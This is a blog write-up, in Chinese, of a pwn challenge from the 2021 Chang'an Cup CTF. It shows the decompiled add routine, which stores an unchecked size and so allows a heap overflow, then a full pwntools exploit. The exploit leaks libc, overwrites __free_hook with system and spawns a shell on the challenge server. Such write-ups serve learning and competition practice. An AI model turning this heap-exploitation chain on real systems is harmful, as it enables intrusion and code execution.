2021长安杯-pwn

Word count: 591   |   Reading time≈ 3 min

高质量比赛,下辈子再来(

非常的皮啊。4道pwn2道0解1道一解,还有道就是这个baigei的36解。。。

这次pwn有repwn,webpwn太难受了,转生吧笑死直接变全栈

看题,看题

漏洞在于add这里,没有对堆下标做检测,导致可以申请同序号的堆,那么我们申请一个随意的堆,在申请同序号的,在size这改为-1之类的,就可以让其在heaparry上的大小变成无限大,导致在edit的时候堆溢出

add

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int sub_A04()
{
  unsigned int v1; // [rsp+0h] [rbp-10h]
  int nbytes; // [rsp+4h] [rbp-Ch]
  void *nbytes_4; // [rsp+8h] [rbp-8h]

  puts("idx?");
  v1 = sub_9A9();
  if ( v1 > 0xF )
    return puts("error!");
  puts("size?");
  nbytes = sub_9A9();
  qword_202060[v1] = nbytes;
  if ( nbytes > 1024 )
    return puts("error!");
  nbytes_4 = malloc(nbytes);
  if ( !nbytes_4 )
    return puts("error!");
  *((_QWORD *)&unk_2020E0 + v1) = nbytes_4;
  puts("content?");
  read(0, *((void **)&unk_2020E0 + v1), (unsigned int)nbytes);
  return puts("success!");
}

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'

def add(id,size,content):
	p.sendlineafter(">>\n",'1')
	p.sendlineafter("idx?\n",str(id))
	p.sendlineafter("size?\n",str(size))
	p.sendafter("content?\n",content)
def delete(id):
	p.sendlineafter(">>\n","2")
	p.sendlineafter("idx?\n",str(id))
def edit(id,size,content):
	p.sendlineafter(">>\n","3")
	p.sendlineafter("idx?\n",str(id))
	p.sendlineafter("size?\n",str(size))
	p.sendafter("content?\n",content)
def show(id):
	p.sendlineafter(">>\n","4")
	p.sendlineafter("idx?\n",str(id))


p = process("./main")
p = remote("113.201.14.253",21111)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

for i in range(16):
	add(i,1024,'a')
for i in range(1,8):
	delete(i)
delete(0)

for i in range(1,8):
	add(i,1024,'b')
for i in range(1,6):
	delete(i)
delete(8)
delete(9)

p.sendlineafter(">>\n",'1')
p.sendlineafter("idx?\n",str(7))
p.sendlineafter("size?\n",str(-1))

payload = 'a'*0x400+p64(0x820)+'\x10'
edit(7,len(payload),payload)
delete(6)

for i in range(7):
	add(i,1024,'a')
add(9,1024,'a')
add(8,1024,'\xa0')
edit(7,8,'a'*8)
show(7)
p.recvuntil('a'*8)
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr-(0x7f41502f7190-0x7f414ff0b000)
print "libc_base:",hex(libc_base)

free_hook = libc_base + libc.sym['__free_hook']
print "free_hook:",free_hook
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()

delete(7)
edit(8,8,p64(free_hook))
add(7,1024,'/bin/sh\x00\x00')
add(6,1024,p64(system))

#gdb.attach(p)
#raw_input()
delete(7)

p.interactive()
  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2021-2023 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信